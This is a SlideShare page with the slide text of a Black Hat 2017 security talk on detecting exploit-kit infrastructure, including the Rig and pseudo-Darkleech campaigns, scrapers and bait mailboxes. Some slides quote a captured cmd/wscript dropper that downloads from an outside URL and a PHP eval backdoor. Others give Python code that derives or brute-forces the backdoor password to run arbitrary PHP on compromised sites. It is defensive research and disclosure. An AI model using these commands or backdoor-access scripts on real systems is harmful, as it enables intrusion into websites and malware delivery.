Successfully reported this slideshow.
Your SlideShare is downloading. ×

Exploit Kit Cornucopia - Blackhat USA 2017

Ad

Brad Antoniewicz
(statements and opinions do not represent the views of, or have been endorsed by, our employer)
Matt Fole...

Ad

2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Speakers
Matt Foley
Intern @ Cisco Umbrella
C...

Ad

3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Agenda
Background
Crawling
Amplifying Convict...

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Check these out next

1 of 59 Ad
1 of 59 Ad

Exploit Kit Cornucopia - Blackhat USA 2017

Download to read offline

Matt Foley and Brad Antoniewicz - Detecting the compromised websites, gates, and dedicated hosts that make up the infrastructure used by Exploit Kits involves a variety of creative techniques. In this session, we will detail four approaches to uncovering these systems while explaining the underlying architecture of Exploit Kit networks. We will disclose a vulnerability in the injected code placed on compromised websites and exploit that vulnerability to uncover deeper infrastructure. Finally, we'll introduce a novel approach to obtaining the malware sent via phishing campaigns which is often the same result of an Exploit Kit compromise.

Note: This presentation contained embedded GIFs that do not animate in this release.

Matt Foley and Brad Antoniewicz - Detecting the compromised websites, gates, and dedicated hosts that make up the infrastructure used by Exploit Kits involves a variety of creative techniques. In this session, we will detail four approaches to uncovering these systems while explaining the underlying architecture of Exploit Kit networks. We will disclose a vulnerability in the injected code placed on compromised websites and exploit that vulnerability to uncover deeper infrastructure. Finally, we'll introduce a novel approach to obtaining the malware sent via phishing campaigns which is often the same result of an Exploit Kit compromise.

Note: This presentation contained embedded GIFs that do not animate in this release.

More Related Content

Similar to Exploit Kit Cornucopia - Blackhat USA 2017 (20)

Exploit Kit Cornucopia - Blackhat USA 2017

  1. 1. Brad Antoniewicz (statements and opinions do not represent the views of, or have been endorsed by, our employer) Matt Foley Exploit Kit Cornucopia
  2. 2. 2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Speakers Matt Foley Intern @ Cisco Umbrella CS Major @ NYU Tandon Brad Antoniewicz Researcher @ Cisco Umbrella @brad_anton http://www.zenn.com.sg/Marketplace%20images/Speakers/Tannoy%20Berkeley%20speakers%20(2).JPG
  3. 3. 3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Agenda Background Crawling Amplifying Convictions Backdoored Disposable Mailboxes http://fc06.deviantart.net/fs70/i/2013/248/4/3/bearshark_blueprints_wallpaper_1600x900_by_dangerousdeven-d6l544l.png
  4. 4. 6© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  5. 5. 7© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Pseudo-Darkleech Campaign Using Rig Exploit Kit
  6. 6. 8© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Kit Script Ransomware , Trojan, etc...
  7. 7. 9© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c "+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp "gexywoaxor" "http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
  8. 8. 10© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Landing Page Injection Compromised Site Ad Net. Subscriber Staged Site (Ad) Victim Malvertising Compromised Site RIG Server Gets lander (proxy) Step 1.
  9. 9. 11© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Filtering Compromised Site Ad Net. Subscriber Staged Site (Ad) RIG Server Victim Malvertising Compromised Site Gets ‘proxy’ TDS/Crawler Filtering TDS TDS, Browser, IP, Region, Time Step 1.
  10. 10. 12© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  11. 11. 13© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  12. 12. 14© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Delivery Victim Step 1. Step 2. Render iframe Lander Virtual Dedicated Server (VDS) Gets exploit
  13. 13. 15© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  14. 14. 16© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Regurgitation CVE-2015-8651 (Flash) CVE-2015-0311 (Flash) CVE-2016-4117 (Flash) CVE-2016-0189 (IE) CVE-2015-2419 (IE)
  15. 15. 17© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
  16. 16. 18© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential ektracker.com Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
  17. 17. 19© 2017 Cisco and/or its affiliates. All rights reserved. Cisco ConfidentialIP/ASN relationships
  18. 18. 20© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Domains/Registrants
  19. 19. 21© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraping
  20. 20. 22© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Orchestration Domains in queue Worker Worker
  21. 21. 23© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Worker DOM Query site twice, then diff dom/source Requests source Filters
  22. 22. 24© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Popularity and Spike Google.com Lander
  23. 23. 25© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V1 BLOCKED
  24. 24. 26© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V2 Candidate 1 EK Decoder Module Candidate 2 Candidate 3 Browser (requests) Browser (requests) Detector Module
  25. 25. 27© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Decoder Module Lander Source and suspected EK passed to decoder EK Decoder Module Flash exploits, executables, etc. Decoder parses JS and identifies EK artifacts
  26. 26. 28© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V2 Rotating IPsChoice of regionSquid Proxy
  27. 27. 29© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sources for Scraping ektracker.com malware-traffic-analysis.net zerophagemalware.com broadanalysis.com malwarebreakdown.com Credit: @nao_sec (Where to get suspected exploit kit sites)
  28. 28. 30© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://culturedcode.com/things/iphone/makingof/List-02-Sketch.jpg https://s-media-cache-ak0.pinimg.com/736x/51/41/b1/5141b1839f3c8484cf510750044366f7.jpg Amplifying Convictions with Hitlist
  29. 29. 31© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  30. 30. 32© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Compromised Site: Unknown Backend Logs Gate: Known
  31. 31. 33© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Conviction: Amplified! S3 Lambda if host in eks: s3.put_object(...) Logs EK List Candidates Filter Convict
  32. 32. 34© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Teamwork makes the dream work Scraper: Finds Landers, Confirms HitList detections HitList: Finds compromised sites
  33. 33. 35© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Show graphic of detections! Fancy D3 graph goes here Gates to compromised sites
  34. 34. 36© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoored
  35. 35. 37© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Campaign Orchestration Compromised Sites preg_replace(‘/12/e’,$code,‘12’) nav-menu.php backdoor (pseudo-darkleech) Attacker eval()
  36. 36. 38© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor Obfuscation and ‘Security’ $_passssword = '0a02419ec68460d4a320c53b680441ff'; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); nav-menu.php backdoor
  37. 37. 39© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential '0a02419ec68460d4a320c53b680441ff'
  38. 38. 40© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential $url = decrypt_url(‘a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA=’); nav-menu.php backdoor
  39. 39. 41© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid?
  40. 40. 42© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid? /blog/?manchester&utm_source=65857:1018137:2013 /blog/?manchester&utm_source=50426:1022174:2013 /blog/?manchester&utm_source=77620:1019894:2013 /blog/?manchester&utm_source=33398:1017062:2013
  41. 41. 43© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor access pw = hashlib.md5(‘1021107’).hexdigest() data = { pw: ‘preg_match’, ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } requests.post(compromised_site, data=data)
  42. 42. 44© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential nginx Apache Reasonable, but still good for us awwwyisssss
  43. 43. 45© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Brute Forcing data = { ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } for i in range(1010000, 1030000): pw = hashlib.md5(str(i)).hexdigest() data[pw] = ‘preg_match’ requests.post(compromised_site, data=data)
  44. 44. 46© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential POST Data
  45. 45. 47© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Bypassing Filtering Compromised Site Staged Site (Ad) RIG Server Request new gates, spoof UserAgent, Source IP, etc..
  46. 46. 48© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Reliable EK Server Hosting
  47. 47. 49© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Disposable Mailboxes
  48. 48. 50© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Not good for research
  49. 49. 51@brad_anton
  50. 50. 52© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential MailRunnerIdentifying ransomware and commodity malware Bait Mailboxes Block Dewey Classification Engine Convict, then pass on email attributes
  51. 51. 53© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Detections (One mailbox) 7.4k Malicious Emails 15k Unique Domains @brad_anton
  52. 52. 54© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential lacedmail.com
  53. 53. 55© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Little Things
  54. 54. 56© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  55. 55. 57© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  56. 56. 58© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recap Good for researchBad guy mistakes :)Amplify convictionsRoll your own scraper/proxy

×